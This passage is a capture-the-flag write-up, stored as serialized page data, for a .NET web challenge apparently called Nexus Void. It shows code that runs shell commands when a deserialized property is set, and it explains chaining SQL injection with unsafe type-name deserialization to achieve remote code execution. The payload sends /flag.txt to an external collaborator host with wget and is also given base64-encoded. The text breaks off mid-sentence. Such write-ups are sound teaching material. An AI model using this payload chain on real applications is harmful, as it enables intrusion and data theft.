",{"type":33,"tag":128,"props":39055,"children":39056},{"style":312},[39057],{"type":38,"value":7246},{"type":33,"tag":128,"props":39059,"children":39060},{"style":140},[39061],{"type":38,"value":39062},"memoryUsage",{"type":33,"tag":128,"props":39064,"children":39065},{"style":312},[39066],{"type":38,"value":5730},{"type":33,"tag":128,"props":39068,"children":39069},{"style":151},[39070],{"type":38,"value":38268},{"type":33,"tag":128,"props":39072,"children":39073},{"style":140},[39074],{"type":38,"value":39075},"Disk Space: ",{"type":33,"tag":128,"props":39077,"children":39078},{"style":312},[39079],{"type":38,"value":7246},{"type":33,"tag":128,"props":39081,"children":39082},{"style":140},[39083],{"type":38,"value":39084},"diskUsage",{"type":33,"tag":128,"props":39086,"children":39087},{"style":312},[39088],{"type":38,"value":5730},{"type":33,"tag":128,"props":39090,"children":39091},{"style":676},[39092],{"type":38,"value":669},{"type":33,"tag":128,"props":39094,"children":39095},{"style":312},[39096],{"type":38,"value":5815},{"type":33,"tag":128,"props":39098,"children":39099},{"class":130,"line":1076},[39100],{"type":33,"tag":128,"props":39101,"children":39102},{"style":312},[39103],{"type":38,"value":854},{"type":33,"tag":47,"props":39105,"children":39106},{},[39107,39109,39115],{"type":38,"value":39108},"And the ",{"type":33,"tag":105,"props":39110,"children":39112},{"className":39111},[],[39113],{"type":38,"value":39114},"StatusCheckHelper",{"type":38,"value":39116}," class is as follows:",{"type":33,"tag":114,"props":39118,"children":39119},{"lang":35074},[39120],{"type":33,"tag":119,"props":39121,"children":39123},{"code":39122,"language":35074,"meta":8,"className":35079,"style":8},"using System.Diagnostics;\n\nnamespace Nexus_Void.Helpers\n{\n public class StatusCheckHelper\n {\n public string output { get; set; }\n private string _command;\n public string command \n {\n get { return _command; }\n\n set\n {\n _command = value;\n try\n {\n var p = new System.Diagnostics.Process();\n\n var processStartInfo = new ProcessStartInfo()\n {\n WindowStyle = ProcessWindowStyle.Hidden,\n FileName = $\"/bin/bash\",\n WorkingDirectory = \"/tmp\",\n Arguments = $\"-c \\\"{_command}\\\"\",\n RedirectStandardOutput = true,\n RedirectStandardError = true,\n UseShellExecute = false\n };\n p.StartInfo = processStartInfo;\n p.Start();\n output = p.StandardOutput.ReadToEnd();\n }\n [...]\n }\n }\n\n\n }\n}\n",[39124],{"type":33,"tag":105,"props":39125,"children":39126},{"__ignoreMap":8},[39127,39151,39158,39177,39184,39200,39207,39247,39268,39287,39294,39323,39330,39338,39345,39365,39373,39381,39426,39433,39462,39470,39500,39529,39557,39607,39627,39647,39664,39672,39701,39721,39759,39767,39787,39794,39801,39808,39815,39822],{"type":33,"tag":128,"props":39128,"children":39129},{"class":130,"line":131},[39130,39134,39138,39142,39147],{"type":33,"tag":128,"props":39131,"children":39132},{"style":1576},[39133],{"type":38,"value":37044},{"type":33,"tag":128,"props":39135,"children":39136},{"style":30339},[39137],{"type":38,"value":37759},{"type":33,"tag":128,"props":39139,"children":39140},{"style":312},[39141],{"type":38,"value":215},{"type":33,"tag":128,"props":39143,"children":39144},{"style":30339},[39145],{"type":38,"value":39146},"Diagnostics",{"type":33,"tag":128,"props":39148,"children":39149},{"style":312},[39150],{"type":38,"value":5676},{"type":33,"tag":128,"props":39152,"children":39153},{"class":130,"line":362},[39154],{"type":33,"tag":128,"props":39155,"children":39156},{"emptyLinePlaceholder":896},[39157],{"type":38,"value":899},{"type":33,"tag":128,"props":39159,"children":39160},{"class":130,"line":403},[39161,39165,39169,39173],{"type":33,"tag":128,"props":39162,"children":39163},{"style":300},[39164],{"type":38,"value":37102},{"type":33,"tag":128,"props":39166,"children":39167},{"style":30339},[39168],{"type":38,"value":37074},{"type":33,"tag":128,"props":39170,"children":39171},{"style":312},[39172],{"type":38,"value":215},{"type":33,"tag":128,"props":39174,"children":39175},{"style":30339},[39176],{"type":38,"value":37115},{"type":33,"tag":128,"props":39178,"children":39179},{"class":130,"line":739},[39180],{"type":33,"tag":128,"props":39181,"children":39182},{"style":312},[39183],{"type":38,"value":650},{"type":33,"tag":128,"props":39185,"children":39186},{"class":130,"line":765},[39187,39191,39195],{"type":33,"tag":128,"props":39188,"children":39189},{"style":300},[39190],{"type":38,"value":37130},{"type":33,"tag":128,"props":39192,"children":39193},{"style":300},[39194],{"type":38,"value":6009},{"type":33,"tag":128,"props":39196,"children":39197},{"style":30339},[39198],{"type":38,"value":39199}," StatusCheckHelper\n",{"type":33,"tag":128,"props":39201,"children":39202},{"class":130,"line":804},[39203],{"type":33,"tag":128,"props":39204,"children":39205},{"style":312},[39206],{"type":38,"value":12699},{"type":33,"tag":128,"props":39208,"children":39209},{"class":130,"line":839},[39210,39214,39218,39223,39227,39231,39235,39239,39243],{"type":33,"tag":128,"props":39211,"children":39212},{"style":300},[39213],{"type":38,"value":37154},{"type":33,"tag":128,"props":39215,"children":39216},{"style":1576},[39217],{"type":38,"value":35330},{"type":33,"tag":128,"props":39219,"children":39220},{"style":135},[39221],{"type":38,"value":39222}," output",{"type":33,"tag":128,"props":39224,"children":39225},{"style":312},[39226],{"type":38,"value":5642},{"type":33,"tag":128,"props":39228,"children":39229},{"style":300},[39230],{"type":38,"value":37871},{"type":33,"tag":128,"props":39232,"children":39233},{"style":312},[39234],{"type":38,"value":35231},{"type":33,"tag":128,"props":39236,"children":39237},{"style":300},[39238],{"type":38,"value":186},{"type":33,"tag":128,"props":39240,"children":39241},{"style":312},[39242],{"type":38,"value":35231},{"type":33,"tag":128,"props":39244,"children":39245},{"style":312},[39246],{"type":38,"value":37888},{"type":33,"tag":128,"props":39248,"children":39249},{"class":130,"line":848},[39250,39255,39259,39264],{"type":33,"tag":128,"props":39251,"children":39252},{"style":300},[39253],{"type":38,"value":39254}," private",{"type":33,"tag":128,"props":39256,"children":39257},{"style":1576},[39258],{"type":38,"value":35330},{"type":33,"tag":128,"props":39260,"children":39261},{"style":135},[39262],{"type":38,"value":39263}," _command",{"type":33,"tag":128,"props":39265,"children":39266},{"style":312},[39267],{"type":38,"value":5676},{"type":33,"tag":128,"props":39269,"children":39270},{"class":130,"line":976},[39271,39275,39279,39283],{"type":33,"tag":128,"props":39272,"children":39273},{"style":300},[39274],{"type":38,"value":37154},{"type":33,"tag":128,"props":39276,"children":39277},{"style":1576},[39278],{"type":38,"value":35330},{"type":33,"tag":128,"props":39280,"children":39281},{"style":135},[39282],{"type":38,"value":4732},{"type":33,"tag":128,"props":39284,"children":39285},{"style":323},[39286],{"type":38,"value":2008},{"type":33,"tag":128,"props":39288,"children":39289},{"class":130,"line":988},[39290],{"type":33,"tag":128,"props":39291,"children":39292},{"style":312},[39293],{"type":38,"value":35771},{"type":33,"tag":128,"props":39295,"children":39296},{"class":130,"line":1001},[39297,39302,39306,39311,39315,39319],{"type":33,"tag":128,"props":39298,"children":39299},{"style":300},[39300],{"type":38,"value":39301}," get",{"type":33,"tag":128,"props":39303,"children":39304},{"style":312},[39305],{"type":38,"value":5642},{"type":33,"tag":128,"props":39307,"children":39308},{"style":1576},[39309],{"type":38,"value":39310}," return",{"type":33,"tag":128,"props":39312,"children":39313},{"style":306},[39314],{"type":38,"value":39263},{"type":33,"tag":128,"props":39316,"children":39317},{"style":312},[39318],{"type":38,"value":35231},{"type":33,"tag":128,"props":39320,"children":39321},{"style":312},[39322],{"type":38,"value":37888},{"type":33,"tag":128,"props":39324,"children":39325},{"class":130,"line":1014},[39326],{"type":33,"tag":128,"props":39327,"children":39328},{"emptyLinePlaceholder":896},[39329],{"type":38,"value":899},{"type":33,"tag":128,"props":39331,"children":39332},{"class":130,"line":1026},[39333],{"type":33,"tag":128,"props":39334,"children":39335},{"style":300},[39336],{"type":38,"value":39337}," set\n",{"type":33,"tag":128,"props":39339,"children":39340},{"class":130,"line":1038},[39341],{"type":33,"tag":128,"props":39342,"children":39343},{"style":312},[39344],{"type":38,"value":35954},{"type":33,"tag":128,"props":39346,"children":39347},{"class":130,"line":1051},[39348,39353,39357,39361],{"type":33,"tag":128,"props":39349,"children":39350},{"style":306},[39351],{"type":38,"value":39352}," _command",{"type":33,"tag":128,"props":39354,"children":39355},{"style":312},[39356],{"type":38,"value":5657},{"type":33,"tag":128,"props":39358,"children":39359},{"style":306},[39360],{"type":38,"value":13031},{"type":33,"tag":128,"props":39362,"children":39363},{"style":312},[39364],{"type":38,"value":5676},{"type":33,"tag":128,"props":39366,"children":39367},{"class":130,"line":1063},[39368],{"type":33,"tag":128,"props":39369,"children":39370},{"style":1576},[39371],{"type":38,"value":39372}," try\n",{"type":33,"tag":128,"props":39374,"children":39375},{"class":130,"line":1076},[39376],{"type":33,"tag":128,"props":39377,"children":39378},{"style":312},[39379],{"type":38,"value":39380}," {\n",{"type":33,"tag":128,"props":39382,"children":39383},{"class":130,"line":1089},[39384,39389,39393,39397,39401,39405,39409,39413,39417,39422],{"type":33,"tag":128,"props":39385,"children":39386},{"style":300},[39387],{"type":38,"value":39388}," var",{"type":33,"tag":128,"props":39390,"children":39391},{"style":135},[39392],{"type":38,"value":15978},{"type":33,"tag":128,"props":39394,"children":39395},{"style":312},[39396],{"type":38,"value":5657},{"type":33,"tag":128,"props":39398,"children":39399},{"style":300},[39400],{"type":38,"value":13061},{"type":33,"tag":128,"props":39402,"children":39403},{"style":30339},[39404],{"type":38,"value":37759},{"type":33,"tag":128,"props":39406,"children":39407},{"style":312},[39408],{"type":38,"value":215},{"type":33,"tag":128,"props":39410,"children":39411},{"style":30339},[39412],{"type":38,"value":39146},{"type":33,"tag":128,"props":39414,"children":39415},{"style":312},[39416],{"type":38,"value":215},{"type":33,"tag":128,"props":39418,"children":39419},{"style":30339},[39420],{"type":38,"value":39421},"Process",{"type":33,"tag":128,"props":39423,"children":39424},{"style":312},[39425],{"type":38,"value":15496},{"type":33,"tag":128,"props":39427,"children":39428},{"class":130,"line":1101},[39429],{"type":33,"tag":128,"props":39430,"children":39431},{"emptyLinePlaceholder":896},[39432],{"type":38,"value":899},{"type":33,"tag":128,"props":39434,"children":39435},{"class":130,"line":1114},[39436,39440,39445,39449,39453,39458],{"type":33,"tag":128,"props":39437,"children":39438},{"style":300},[39439],{"type":38,"value":39388},{"type":33,"tag":128,"props":39441,"children":39442},{"style":135},[39443],{"type":38,"value":39444}," processStartInfo",{"type":33,"tag":128,"props":39446,"children":39447},{"style":312},[39448],{"type":38,"value":5657},{"type":33,"tag":128,"props":39450,"children":39451},{"style":300},[39452],{"type":38,"value":13061},{"type":33,"tag":128,"props":39454,"children":39455},{"style":30339},[39456],{"type":38,"value":39457}," ProcessStartInfo",{"type":33,"tag":128,"props":39459,"children":39460},{"style":312},[39461],{"type":38,"value":7857},{"type":33,"tag":128,"props":39463,"children":39464},{"class":130,"line":1127},[39465],{"type":33,"tag":128,"props":39466,"children":39467},{"style":312},[39468],{"type":38,"value":39469}," {\n",{"type":33,"tag":128,"props":39471,"children":39472},{"class":130,"line":1139},[39473,39478,39482,39487,39491,39496],{"type":33,"tag":128,"props":39474,"children":39475},{"style":306},[39476],{"type":38,"value":39477}," WindowStyle",{"type":33,"tag":128,"props":39479,"children":39480},{"style":312},[39481],{"type":38,"value":5657},{"type":33,"tag":128,"props":39483,"children":39484},{"style":306},[39485],{"type":38,"value":39486}," ProcessWindowStyle",{"type":33,"tag":128,"props":39488,"children":39489},{"style":312},[39490],{"type":38,"value":215},{"type":33,"tag":128,"props":39492,"children":39493},{"style":306},[39494],{"type":38,"value":39495},"Hidden",{"type":33,"tag":128,"props":39497,"children":39498},{"style":312},[39499],{"type":38,"value":693},{"type":33,"tag":128,"props":39501,"children":39502},{"class":130,"line":1152},[39503,39508,39512,39516,39521,39525],{"type":33,"tag":128,"props":39504,"children":39505},{"style":306},[39506],{"type":38,"value":39507}," FileName",{"type":33,"tag":128,"props":39509,"children":39510},{"style":312},[39511],{"type":38,"value":5657},{"type":33,"tag":128,"props":39513,"children":39514},{"style":676},[39515],{"type":38,"value":35201},{"type":33,"tag":128,"props":39517,"children":39518},{"style":140},[39519],{"type":38,"value":39520},"/bin/bash",{"type":33,"tag":128,"props":39522,"children":39523},{"style":676},[39524],{"type":38,"value":669},{"type":33,"tag":128,"props":39526,"children":39527},{"style":312},[39528],{"type":38,"value":693},{"type":33,"tag":128,"props":39530,"children":39531},{"class":130,"line":1165},[39532,39537,39541,39545,39549,39553],{"type":33,"tag":128,"props":39533,"children":39534},{"style":306},[39535],{"type":38,"value":39536}," WorkingDirectory",{"type":33,"tag":128,"props":39538,"children":39539},{"style":312},[39540],{"type":38,"value":5657},{"type":33,"tag":128,"props":39542,"children":39543},{"style":676},[39544],{"type":38,"value":679},{"type":33,"tag":128,"props":39546,"children":39547},{"style":140},[39548],{"type":38,"value":9050},{"type":33,"tag":128,"props":39550,"children":39551},{"style":676},[39552],{"type":38,"value":669},{"type":33,"tag":128,"props":39554,"children":39555},{"style":312},[39556],{"type":38,"value":693},{"type":33,"tag":128,"props":39558,"children":39559},{"class":130,"line":1177},[39560,39565,39569,39573,39578,39582,39586,39591,39595,39599,39603],{"type":33,"tag":128,"props":39561,"children":39562},{"style":306},[39563],{"type":38,"value":39564}," Arguments",{"type":33,"tag":128,"props":39566,"children":39567},{"style":312},[39568],{"type":38,"value":5657},{"type":33,"tag":128,"props":39570,"children":39571},{"style":676},[39572],{"type":38,"value":35201},{"type":33,"tag":128,"props":39574,"children":39575},{"style":140},[39576],{"type":38,"value":39577},"-c ",{"type":33,"tag":128,"props":39579,"children":39580},{"style":151},[39581],{"type":38,"value":10544},{"type":33,"tag":128,"props":39583,"children":39584},{"style":312},[39585],{"type":38,"value":7246},{"type":33,"tag":128,"props":39587,"children":39588},{"style":140},[39589],{"type":38,"value":39590},"_command",{"type":33,"tag":128,"props":39592,"children":39593},{"style":312},[39594],{"type":38,"value":5730},{"type":33,"tag":128,"props":39596,"children":39597},{"style":151},[39598],{"type":38,"value":10544},{"type":33,"tag":128,"props":39600,"children":39601},{"style":676},[39602],{"type":38,"value":669},{"type":33,"tag":128,"props":39604,"children":39605},{"style":312},[39606],{"type":38,"value":693},{"type":33,"tag":128,"props":39608,"children":39609},{"class":130,"line":1189},[39610,39615,39619,39623],{"type":33,"tag":128,"props":39611,"children":39612},{"style":306},[39613],{"type":38,"value":39614}," RedirectStandardOutput",{"type":33,"tag":128,"props":39616,"children":39617},{"style":312},[39618],{"type":38,"value":5657},{"type":33,"tag":128,"props":39620,"children":39621},{"style":1576},[39622],{"type":38,"value":5850},{"type":33,"tag":128,"props":39624,"children":39625},{"style":312},[39626],{"type":38,"value":693},{"type":33,"tag":128,"props":39628,"children":39629},{"class":130,"line":1202},[39630,39635,39639,39643],{"type":33,"tag":128,"props":39631,"children":39632},{"style":306},[39633],{"type":38,"value":39634}," RedirectStandardError",{"type":33,"tag":128,"props":39636,"children":39637},{"style":312},[39638],{"type":38,"value":5657},{"type":33,"tag":128,"props":39640,"children":39641},{"style":1576},[39642],{"type":38,"value":5850},{"type":33,"tag":128,"props":39644,"children":39645},{"style":312},[39646],{"type":38,"value":693},{"type":33,"tag":128,"props":39648,"children":39649},{"class":130,"line":1214},[39650,39655,39659],{"type":33,"tag":128,"props":39651,"children":39652},{"style":306},[39653],{"type":38,"value":39654}," UseShellExecute",{"type":33,"tag":128,"props":39656,"children":39657},{"style":312},[39658],{"type":38,"value":5657},{"type":33,"tag":128,"props":39660,"children":39661},{"style":1576},[39662],{"type":38,"value":39663}," false\n",{"type":33,"tag":128,"props":39665,"children":39666},{"class":130,"line":1226},[39667],{"type":33,"tag":128,"props":39668,"children":39669},{"style":312},[39670],{"type":38,"value":39671}," };\n",{"type":33,"tag":128,"props":39673,"children":39674},{"class":130,"line":1239},[39675,39680,39684,39689,39693,39697],{"type":33,"tag":128,"props":39676,"children":39677},{"style":306},[39678],{"type":38,"value":39679}," p",{"type":33,"tag":128,"props":39681,"children":39682},{"style":312},[39683],{"type":38,"value":215},{"type":33,"tag":128,"props":39685,"children":39686},{"style":306},[39687],{"type":38,"value":39688},"StartInfo",{"type":33,"tag":128,"props":39690,"children":39691},{"style":312},[39692],{"type":38,"value":5657},{"type":33,"tag":128,"props":39694,"children":39695},{"style":306},[39696],{"type":38,"value":39444},{"type":33,"tag":128,"props":39698,"children":39699},{"style":312},[39700],{"type":38,"value":5676},{"type":33,"tag":128,"props":39702,"children":39703},{"class":130,"line":1251},[39704,39708,39712,39717],{"type":33,"tag":128,"props":39705,"children":39706},{"style":306},[39707],{"type":38,"value":39679},{"type":33,"tag":128,"props":39709,"children":39710},{"style":312},[39711],{"type":38,"value":215},{"type":33,"tag":128,"props":39713,"children":39714},{"style":135},[39715],{"type":38,"value":39716},"Start",{"type":33,"tag":128,"props":39718,"children":39719},{"style":312},[39720],{"type":38,"value":15496},{"type":33,"tag":128,"props":39722,"children":39723},{"class":130,"line":1263},[39724,39729,39733,39737,39741,39746,39750,39755],{"type":33,"tag":128,"props":39725,"children":39726},{"style":306},[39727],{"type":38,"value":39728}," output",{"type":33,"tag":128,"props":39730,"children":39731},{"style":312},[39732],{"type":38,"value":5657},{"type":33,"tag":128,"props":39734,"children":39735},{"style":306},[39736],{"type":38,"value":15978},{"type":33,"tag":128,"props":39738,"children":39739},{"style":312},[39740],{"type":38,"value":215},{"type":33,"tag":128,"props":39742,"children":39743},{"style":306},[39744],{"type":38,"value":39745},"StandardOutput",{"type":33,"tag":128,"props":39747,"children":39748},{"style":312},[39749],{"type":38,"value":215},{"type":33,"tag":128,"props":39751,"children":39752},{"style":135},[39753],{"type":38,"value":39754},"ReadToEnd",{"type":33,"tag":128,"props":39756,"children":39757},{"style":312},[39758],{"type":38,"value":15496},{"type":33,"tag":128,"props":39760,"children":39761},{"class":130,"line":1276},[39762],{"type":33,"tag":128,"props":39763,"children":39764},{"style":312},[39765],{"type":38,"value":39766}," }\n",{"type":33,"tag":128,"props":39768,"children":39769},{"class":130,"line":1288},[39770,39775,39779,39783],{"type":33,"tag":128,"props":39771,"children":39772},{"style":312},[39773],{"type":38,"value":39774}," [",{"type":33,"tag":128,"props":39776,"children":39777},{"style":300},[39778],{"type":38,"value":35256},{"type":33,"tag":128,"props":39780,"children":39781},{"style":323},[39782],{"type":38,"value":215},{"type":33,"tag":128,"props":39784,"children":39785},{"style":312},[39786],{"type":38,"value":3262},{"type":33,"tag":128,"props":39788,"children":39789},{"class":130,"line":1300},[39790],{"type":33,"tag":128,"props":39791,"children":39792},{"style":312},[39793],{"type":38,"value":35996},{"type":33,"tag":128,"props":39795,"children":39796},{"class":130,"line":1313},[39797],{"type":33,"tag":128,"props":39798,"children":39799},{"style":312},[39800],{"type":38,"value":15318},{"type":33,"tag":128,"props":39802,"children":39803},{"class":130,"line":1327},[39804],{"type":33,"tag":128,"props":39805,"children":39806},{"emptyLinePlaceholder":896},[39807],{"type":38,"value":899},{"type":33,"tag":128,"props":39809,"children":39810},{"class":130,"line":11196},[39811],{"type":33,"tag":128,"props":39812,"children":39813},{"emptyLinePlaceholder":896},[39814],{"type":38,"value":899},{"type":33,"tag":128,"props":39816,"children":39817},{"class":130,"line":11204},[39818],{"type":33,"tag":128,"props":39819,"children":39820},{"style":312},[39821],{"type":38,"value":6760},{"type":33,"tag":128,"props":39823,"children":39824},{"class":130,"line":11213},[39825],{"type":33,"tag":128,"props":39826,"children":39827},{"style":312},[39828],{"type":38,"value":854},{"type":33,"tag":47,"props":39830,"children":39831},{},[39832,39834,39839],{"type":38,"value":39833},"We can see that it is when setting the value of the ",{"type":33,"tag":105,"props":39835,"children":39837},{"className":39836},[],[39838],{"type":38,"value":38795},{"type":38,"value":39840}," attribute that the system function is called. So, our goal now is to exploit deserialization with an instance of this class where we have set the command with our payload.",{"type":33,"tag":47,"props":39842,"children":39843},{},[39844],{"type":38,"value":39845},"This is what we will see in the next chapter.",{"type":33,"tag":40,"props":39847,"children":39849},{"id":39848},"exploitation",[39850],{"type":38,"value":39851},"Exploitation",{"type":33,"tag":47,"props":39853,"children":39854},{},[39855],{"type":38,"value":39856},"We have SQL injection vulnerabilities on each query, an unsafe deserialization from a database result allowing us to achieve remote code execution (RCE). Therefore, we can exploit this SQLi to our advantage for RCE.",{"type":33,"tag":88,"props":39858,"children":39860},{"id":39859},"create-a-serialized-payload",[39861],{"type":38,"value":39862},"Create a serialized payload",{"type":33,"tag":47,"props":39864,"children":39865},{},[39866,39868,39873],{"type":38,"value":39867},"To begin, we need to create a serialized payload that will contain an instance of the ",{"type":33,"tag":105,"props":39869,"children":39871},{"className":39870},[],[39872],{"type":38,"value":39114},{"type":38,"value":39874}," class, which will set a value to the command.",{"type":33,"tag":47,"props":39876,"children":39877},{},[39878],{"type":38,"value":39879},"Our payload will be as follows:",{"type":33,"tag":114,"props":39881,"children":39882},{"lang":633},[39883],{"type":33,"tag":119,"props":39884,"children":39886},{"code":39885,"language":633,"meta":8,"className":637,"style":8},"{\n\"$type\": \"Nexus_Void.Helpers.StatusCheckHelper, Nexus_Void\",\n\"command\": \"wget --header='Content-type: multipart/form-data boundary=FILEUPLOAD' --post-file /flag.txt http://aesz1k6cgyylzco4zrdoyv12ltrqfq3f.oastify.com\"\n}\n",[39887],{"type":33,"tag":105,"props":39888,"children":39889},{"__ignoreMap":8},[39890,39897,39933,39965],{"type":33,"tag":128,"props":39891,"children":39892},{"class":130,"line":131},[39893],{"type":33,"tag":128,"props":39894,"children":39895},{"style":312},[39896],{"type":38,"value":650},{"type":33,"tag":128,"props":39898,"children":39899},{"class":130,"line":362},[39900,39904,39908,39912,39916,39920,39925,39929],{"type":33,"tag":128,"props":39901,"children":39902},{"style":656},[39903],{"type":38,"value":669},{"type":33,"tag":128,"props":39905,"children":39906},{"style":437},[39907],{"type":38,"value":38619},{"type":33,"tag":128,"props":39909,"children":39910},{"style":656},[39911],{"type":38,"value":669},{"type":33,"tag":128,"props":39913,"children":39914},{"style":312},[39915],{"type":38,"value":284},{"type":33,"tag":128,"props":39917,"children":39918},{"style":676},[39919],{"type":38,"value":679},{"type":33,"tag":128,"props":39921,"children":39922},{"style":140},[39923],{"type":38,"value":39924},"Nexus_Void.Helpers.StatusCheckHelper, Nexus_Void",{"type":33,"tag":128,"props":39926,"children":39927},{"style":676},[39928],{"type":38,"value":669},{"type":33,"tag":128,"props":39930,"children":39931},{"style":312},[39932],{"type":38,"value":693},{"type":33,"tag":128,"props":39934,"children":39935},{"class":130,"line":403},[39936,39940,39944,39948,39952,39956,39961],{"type":33,"tag":128,"props":39937,"children":39938},{"style":656},[39939],{"type":38,"value":669},{"type":33,"tag":128,"props":39941,"children":39942},{"style":437},[39943],{"type":38,"value":38795},{"type":33,"tag":128,"props":39945,"children":39946},{"style":656},[39947],{"type":38,"value":669},{"type":33,"tag":128,"props":39949,"children":39950},{"style":312},[39951],{"type":38,"value":284},{"type":33,"tag":128,"props":39953,"children":39954},{"style":676},[39955],{"type":38,"value":679},{"type":33,"tag":128,"props":39957,"children":39958},{"style":140},[39959],{"type":38,"value":39960},"wget --header='Content-type: multipart/form-data boundary=FILEUPLOAD' --post-file /flag.txt http://aesz1k6cgyylzco4zrdoyv12ltrqfq3f.oastify.com",{"type":33,"tag":128,"props":39962,"children":39963},{"style":676},[39964],{"type":38,"value":836},{"type":33,"tag":128,"props":39966,"children":39967},{"class":130,"line":739},[39968],{"type":33,"tag":128,"props":39969,"children":39970},{"style":312},[39971],{"type":38,"value":854},{"type":33,"tag":47,"props":39973,"children":39974},{},[39975],{"type":38,"value":39976},"There is some detail about this payload:",{"type":33,"tag":32400,"props":39978,"children":39981},{"width":39979,"src":39980},950,"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704406996/writeups/nexus-void/payload_detail.webp",[],{"type":33,"tag":47,"props":39983,"children":39984},{},[39985,39987,39992,39994,39999],{"type":38,"value":39986},"The value of ",{"type":33,"tag":105,"props":39988,"children":39990},{"className":39989},[],[39991],{"type":38,"value":38619},{"type":38,"value":39993}," will allow us to target the instance of the class that will be deserialized. Then we set the attribute ",{"type":33,"tag":105,"props":39995,"children":39997},{"className":39996},[],[39998],{"type":38,"value":38795},{"type":38,"value":40000}," of our instance with our command to be executed.",{"type":33,"tag":114,"props":40002,"children":40003},{"lang":25649},[40004],{"type":33,"tag":119,"props":40005,"children":40007},{"code":40006},"ewoiJHR5cGUiOiAiTmV4dXNfVm9pZC5IZWxwZXJzLlN0YXR1c0NoZWNrSGVscGVyLCBOZXh1c19Wb2lkIiwKImNvbW1hbmQiOiAid2dldCAgLS1oZWFkZXI9Q29udGVudC10eXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhIGJvdW5kYXJ5PUZJTEVVUExPQUQgLS1wb3N0LWZpbGUgL2ZsYWcudHh0IFtodHRwOi8vYWVzejFrNmNneXlsemNvNHpyZG95djEybHRycWZxM2Yub2FzdGlmeS5jb21dKGh0dHA6Ly9hZXN6MWs2Y2d5eWx6Y280enJkb3l2MTJsdHJxZnEzZi5vYXN0aWZ5LmNvbS8pIgp9Cg==\n",[40008],{"type":33,"tag":105,"props":40009,"children":40010},{"__ignoreMap":8},[40011],{"type":38,"value":40006},{"type":33,"tag":88,"props":40013,"children":40015},{"id":40014},"update-the-database",[40016],{"type":38,"value":40017},"Update the database",{"type":33,"tag":47,"props":40019,"children":40020},{},[40021],{"type":38,"value":40022},"The deserialization is triggered when the Wishlist is retrieved. The wishlist is specific to our account, so we need to start by adding a product to our wishlist, the first one for example.",{"type":33,"tag":47,"props":40024,"children":40025},{},[40026],{"type":38,"value":40027},"After adding the product with ID 1 to our wishlist, we need to update the database to change the value of the data for our wishlist.",{"type":33,"tag":75,"props":40029,"children":40031},{"imgSrc":40030},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499801/writeups/nexus-void/favorites_frontend.webp",[],{"type":33,"tag":47,"props":40033,"children":40034},{},[40035],{"type":38,"value":40036},"The associated query is as follows:",{"type":33,"tag":75,"props":40038,"children":40040},{"imgSrc":40039},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499797/writeups/nexus-void/request_add_elmt_wishlist.webp",[],{"type":33,"tag":47,"props":40042,"children":40043},{},[40044],{"type":38,"value":40045},"If we go to the wishlist page, we can see the product added to the list.",{"type":33,"tag":75,"props":40047,"children":40049},{"imgSrc":40048},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499793/writeups/nexus-void/wish_list_frontend.webp",[],{"type":33,"tag":47,"props":40051,"children":40052},{},[40053,40055,40060],{"type":38,"value":40054},"It is this product that we will pollute. If we remember the deserialization part, it executes it from the ",{"type":33,"tag":105,"props":40056,"children":40058},{"className":40057},[],[40059],{"type":38,"value":2815},{"type":38,"value":40061}," value of the wishlist result.",{"type":33,"tag":114,"props":40063,"children":40064},{"lang":35074},[40065],{"type":33,"tag":119,"props":40066,"children":40068},{"code":40067,"language":35074,"meta":8,"className":35079,"style":8},"List\u003CProductModel> products = SerializeHelper.Deserialize(wishlist.data);\n",[40069],{"type":33,"tag":105,"props":40070,"children":40071},{"__ignoreMap":8},[40072],{"type":33,"tag":128,"props":40073,"children":40074},{"class":130,"line":131},[40075,40079,40083,40087,40091,40095,40099,40103,40107,40111,40115,40119,40123,40127],{"type":33,"tag":128,"props":40076,"children":40077},{"style":30339},[40078],{"type":38,"value":37176},{"type":33,"tag":128,"props":40080,"children":40081},{"style":312},[40082],{"type":38,"value":5977},{"type":33,"tag":128,"props":40084,"children":40085},{"style":30339},[40086],{"type":38,"value":35788},{"type":33,"tag":128,"props":40088,"children":40089},{"style":312},[40090],{"type":38,"value":6054},{"type":33,"tag":128,"props":40092,"children":40093},{"style":135},[40094],{"type":38,"value":35797},{"type":33,"tag":128,"props":40096,"children":40097},{"style":312},[40098],{"type":38,"value":5657},{"type":33,"tag":128,"props":40100,"children":40101},{"style":306},[40102],{"type":38,"value":35806},{"type":33,"tag":128,"props":40104,"children":40105},{"style":312},[40106],{"type":38,"value":215},{"type":33,"tag":128,"props":40108,"children":40109},{"style":135},[40110],{"type":38,"value":35815},{"type":33,"tag":128,"props":40112,"children":40113},{"style":312},[40114],{"type":38,"value":5566},{"type":33,"tag":128,"props":40116,"children":40117},{"style":306},[40118],{"type":38,"value":35712},{"type":33,"tag":128,"props":40120,"children":40121},{"style":312},[40122],{"type":38,"value":215},{"type":33,"tag":128,"props":40124,"children":40125},{"style":306},[40126],{"type":38,"value":2815},{"type":33,"tag":128,"props":40128,"children":40129},{"style":312},[40130],{"type":38,"value":5815},{"type":33,"tag":47,"props":40132,"children":40133},{},[40134,40136,40141],{"type":38,"value":40135},"So we need to update the ",{"type":33,"tag":105,"props":40137,"children":40139},{"className":40138},[],[40140],{"type":38,"value":2815},{"type":38,"value":40142}," value of our wishlist to contain our serialized payload.",{"type":33,"tag":47,"props":40144,"children":40145},{},[40146],{"type":38,"value":40147},"We can therefore use our previous request.",{"type":33,"tag":47,"props":40149,"children":40150},{},[40151],{"type":33,"tag":2572,"props":40152,"children":40153},{},[40154],{"type":38,"value":40155},"Note: It is possible to chain SQL queries in our injection.",{"type":33,"tag":75,"props":40157,"children":40159},{"imgSrc":40158},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499778/writeups/nexus-void/request_exploit_detail.webp",[],{"type":33,"tag":47,"props":40161,"children":40162},{},[40163],{"type":38,"value":40164},"After that, we can see in the docker logs that we have successfully executed our update query.",{"type":33,"tag":75,"props":40166,"children":40168},{"imgSrc":40167},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499783/writeups/nexus-void/docker_log.webp",[],{"type":33,"tag":47,"props":40170,"children":40171},{},[40172],{"type":38,"value":40173},"We just need to refresh the page that lists our wishlist, which will execute our order. We can then see that our collaborator has received the 